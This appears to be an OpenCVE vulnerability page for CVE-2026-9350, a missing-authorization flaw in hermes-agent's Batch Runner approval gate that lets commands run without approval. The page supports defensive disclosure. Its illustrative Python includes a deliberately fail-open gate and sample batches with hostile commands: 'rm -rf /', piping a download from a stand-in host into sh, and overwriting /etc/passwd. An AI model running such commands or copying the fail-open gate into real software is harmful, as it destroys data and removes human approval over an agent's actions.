Description
A vulnerability was identified in NousResearch hermes-agent up to 2026.4.16. This affects the function check_all_command_guards of the file tools/approval.py of the component Batch Runner. Such manipulation leads to missing authorization. The attack can be launched remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way.
Published: 2026-05-24
Score: 6.9 Medium
EPSS: < 1% Very Low
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

The vulnerability lies in the check_all_command_guards function of tools/approval.py, the approval gate of the Batch Runner component. By manipulating the input to this function, an attacker can bypass the authorization (approval) checks it is supposed to enforce, so commands can be run without the required permission. The weakness is classified as CWE-862 (Missing Authorization) and CWE-863 (Incorrect Authorization); the CVSS vectors published for it rate the direct impact on confidentiality, integrity and availability as low (C:L/I:L/A:L).

Affected Systems

Versions of NousResearch hermes-agent up to and including 2026.4.16 are affected. The flaw resides in the Batch Runner component of hermes-agent, specifically in tools/approval.py.

Risk and Exploitability

With a CVSS 4.0 base score of 6.9 the vulnerability is rated Medium. The EPSS score is below 1% (very low), and the vulnerability is not listed in the CISA KEV catalog. The vectors describe a flaw reachable over the network with no privileges and no user interaction required (AV:N/AC:L/PR:N/UI:N), and exploit code is publicly available, so exploitation is realistic wherever the Batch Runner is reachable. An attacker with network access to the hermes-agent service could use the missing authorization check to have commands run without the approval the guard is meant to enforce; the published vectors rate the resulting impact as low across confidentiality, integrity and availability.

Generated by OpenCVE AI on May 24, 2026 at 04:21 UTC.

Remediation

No vendor fix or workaround has been provided; the vendor did not respond to the disclosure.

OpenCVE Recommended Actions

  • Upgrade to a Hermes-Agent version newer than 2026.4.16 once a vendor patch is available.
  • Restrict network exposure of the Batch Runner component so that only trusted hosts can communicate with it.
  • Enable detailed logging for the Batch Runner and actively monitor logs for anomalous command executions or unauthorized access attempts.
  • Apply the principle of least privilege to all user accounts interacting with Hermes-Agent to limit potential impact if the bypass is successful.

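As an added illustration of the CWE-862 / CWE-863 weakness class named under Impact and of the deny-by-default posture the recommended actions aim at, the following Python compares a fail-open batch command gate with a fail-closed one. This is hypothetical code written for this page, not hermes-agent's tools/approval.py: the page does not describe the real bypass, and the guard names, the two aggregator functions and the sample batches are all constructed. The unsafe version inspects only the first command of a batch and approves whatever no guard vetoes; the safe version judges every command and requires an explicit allow.

```python
"""Illustration of the CWE-862 / CWE-863 class in a command-approval gate.

Hypothetical example code, not taken from NousResearch hermes-agent: the
guards, the two aggregator functions and the sample batches below are
constructed for this page and do not reflect the real tools/approval.py.
Requires Python 3.9+.
"""
import shlex
from typing import Callable, Iterable, Optional

# A guard judges one parsed command (argv) and returns True (allow),
# False (deny) or None (no opinion).
Guard = Callable[[list[str]], Optional[bool]]

# Tokens that end one command and start the next.  Redirections are
# included so that "cat x > /etc/passwd" is not judged as a plain "cat".
SEPARATORS = {";", "&&", "||", "|", "&", "(", ")", "<", ">", ">>"}


def split_batch(batch: str) -> list[list[str]]:
    """Split a shell-style batch into per-command argv lists."""
    lexer = shlex.shlex(batch, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True  # keep "http://host/x" as one token
    commands: list[list[str]] = []
    current: list[str] = []
    for tok in lexer:
        if tok in SEPARATORS:
            if current:
                commands.append(current)
                current = []
        else:
            current.append(tok)
    if current:
        commands.append(current)
    return commands


def deny_destructive(argv: list[str]) -> Optional[bool]:
    """Constructed guard: veto a few destructive binaries."""
    return False if argv and argv[0] in {"rm", "dd", "mkfs", "shred"} else None


def allow_read_only(argv: list[str]) -> Optional[bool]:
    """Constructed guard: explicitly approve a small read-only set."""
    return True if argv and argv[0] in {"ls", "cat", "pwd", "echo"} else None


DEFAULT_GUARDS: list[Guard] = [deny_destructive, allow_read_only]


def check_all_command_guards_unsafe(batch: str,
                                    guards: Iterable[Guard] = DEFAULT_GUARDS) -> bool:
    """Fail-open gate: the pattern behind CWE-862 / CWE-863.

    Two defects: only the first command of the batch is inspected
    (incorrect authorization), and a batch nobody vetoed is approved
    even when no guard ever said "allow" (missing authorization).
    """
    commands = split_batch(batch)
    first = commands[0] if commands else []
    for guard in guards:
        if guard(first) is False:
            return False
    return True


def check_all_command_guards_safe(batch: str,
                                  guards: Iterable[Guard] = DEFAULT_GUARDS) -> bool:
    """Fail-closed gate: every command needs an explicit allow and no deny."""
    guard_list = list(guards)
    commands = split_batch(batch)
    if not commands or not guard_list:
        return False  # nothing to approve, or nobody to approve it
    for argv in commands:
        verdicts = [guard(argv) for guard in guard_list]
        if any(v is False for v in verdicts):
            return False  # any veto wins
        if not any(v is True for v in verdicts):
            return False  # silence is not consent
    return True


if __name__ == "__main__":
    # Constructed sample batches: the first three show the two gates disagreeing.
    for batch in ("ls /tmp; rm -rf /",
                  "curl http://example.invalid/x | sh",
                  "cat notes > /etc/passwd",
                  "ls /tmp && cat /etc/hostname"):
        print(f"{batch!r}: unsafe={check_all_command_guards_unsafe(batch)} "
              f"safe={check_all_command_guards_safe(batch)}")
```

The point of the fail-closed version is that the guard aggregator never has to decide whether an unfamiliar input is harmless: a command that no guard explicitly allows, an empty batch, or an empty guard list all come out as denied, which is the behaviour an approval gate in front of command execution should default to.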

Advisories

No advisories yet.

History

Sun, 24 May 2026 03:30:00 +0000

Type | Values Removed | Values Added
Description | | A vulnerability was identified in NousResearch hermes-agent up to 2026.4.16. This affects the function check_all_command_guards of the file tools/approval.py of the component Batch Runner. Such manipulation leads to missing authorization. The attack can be launched remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way.
Title | | NousResearch hermes-agent Batch Runner approval.py check_all_command_guards authorization
First Time appeared | | Nousresearch; Nousresearch hermes-agent
Weaknesses | | CWE-862; CWE-863
CPEs | | cpe:2.3:a:nousresearch:hermes-agent:*:*:*:*:*:*:*:*
Vendors & Products | | Nousresearch; Nousresearch hermes-agent
References | |
Metrics | | cvssV2_0: score 7.5, vector AV:N/AC:L/Au:N/C:P/I:P/A:P/E:POC/RL:ND/RC:UR
 | | cvssV3_0: score 7.3, vector CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L/E:P/RL:X/RC:R
 | | cvssV3_1: score 7.3, vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L/E:P/RL:X/RC:R
 | | cvssV4_0: score 6.9, vector CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P


MITRE

Status: PUBLISHED

Assigner: VulDB

Published:

Updated: 2026-05-24T02:45:10.330Z

Reserved: 2026-05-23T09:19:30.069Z

Link: CVE-2026-9350

Vulnrichment

No data.

NVD

No data.

Red Hat

No data.

OpenCVE Enrichment

Updated: 2026-05-24T05:15:35Z

Weaknesses